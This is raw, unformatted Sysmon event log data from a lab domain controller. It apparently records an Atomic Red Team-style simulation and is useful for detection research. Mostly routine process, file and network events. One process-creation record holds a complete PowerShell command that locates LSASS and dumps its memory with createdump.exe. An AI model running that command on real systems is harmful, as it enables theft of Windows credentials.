Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9757683D3C162C5AFD81EDD07DD29247,SHA256=7F743BAE0D8A82E9C178930B0F65D2701A3E20BB5F8CDA9C6391604F180C5031,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.926{4DB9351A-A341-60D3-5E06-00000000CF01}6316raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000025768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.914{4DB9351A-9DEA-60D3-2E00-00000000CF01}8ccsca2021.ocsp-certum.com0type: 5 ocsp.akamai.certum.pl;type: 5 ocsp.certum.pl.edgekey.net;type: 5 e96763.dscb.akamaiedge.net;::ffff:104.98.114.187;::ffff:104.98.114.184;C:\Windows\sysmon64.exe 23542300x800000000000000025767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.359{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B8E5A6AB136F94B8CCF99D8C6838BD69,SHA256=450EA0E9C11C9ECE68A0B4C0247FCD412A5F0391579E38E35819B0001DB99973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.359{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ABE51C9055580465B58BC4B99B73B0A,SHA256=94AC7C550CECB329F1F33EDDEA8A686541ABCAEE458E93F043CD5585204C5F81,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000025765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.931{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61542-false185.199.109.133cdn-185-199-109-133.github.com443https 17141700x800000000000000025817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:29.984{4DB9351A-A345-60D3-6306-00000000CF01}3656\PSHost.132689562298776610.3656.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.952{4DB9351A-A345-60D3-6306-00000000CF01}3656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bg0xld0q.vt3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.952{4DB9351A-A345-60D3-6306-00000000CF01}3656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3k5jyb01.y04.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.937{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3k5jyb01.y04.ps12021-06-23 21:10:29.937 
23542300x800000000000000025813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.937{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=82A020500BB418E626458897A4588E31,SHA256=8D33DABD8FD9855CD50C5296CA4F125EC0D06CDC7FE7B4DD904B8DFDDE544DB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.874{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.874{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3
504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.877{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \""Createdump Path C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" $LSASS = tasklist | findstr \""lsass\"" $FIELDS = $LSASS -split \""\s+\"" $ID = $FIELDS[1] & \""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" -u -f C:\Windows\Temp\dotnet-lsass.dmp $ID} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.859{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.827{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=B9033050A56B527AD5C3AD65BAC7626D,SHA256=9DBB8B1E214CD9311A1586951FB3BCCC60E7E70B3A7715E2381456DDF67592BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.719{4DB9351A-A345-60D3-6206-00000000CF01}6784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.250{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.250{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.218{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.218{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:29.187{4DB9351A-A345-60D3-6206-00000000CF01}6784\PSHost.132689562290358870.6784.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.156{4DB9351A-A345-60D3-6206-00000000CF01}6784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q50uhuj4.bkf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.156{4DB9351A-A345-60D3-6206-00000000CF01}6784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rhyvmwfu.0hq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.140{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rhyvmwfu.0hq.ps12021-06-23 21:10:29.140 10341000x800000000000000025790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.093{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000025789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.321{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61543-false10.0.1.12-8000- 354300x800000000000000025788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.069{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-663.attackrange.local53domainfalse127.0.0.1win-dc-663.attackrange.local65525- 354300x800000000000000025787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.038{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local65525- 354300x800000000000000025786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.038{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local56270- 23542300x800000000000000025785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.063{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F321730630652C8BA61092488D4EBB4,SHA256=86137ED727BFC6C5C9327242E3B9D3C842462957F4356F4C9DDF0B395197EF89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:29.031{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 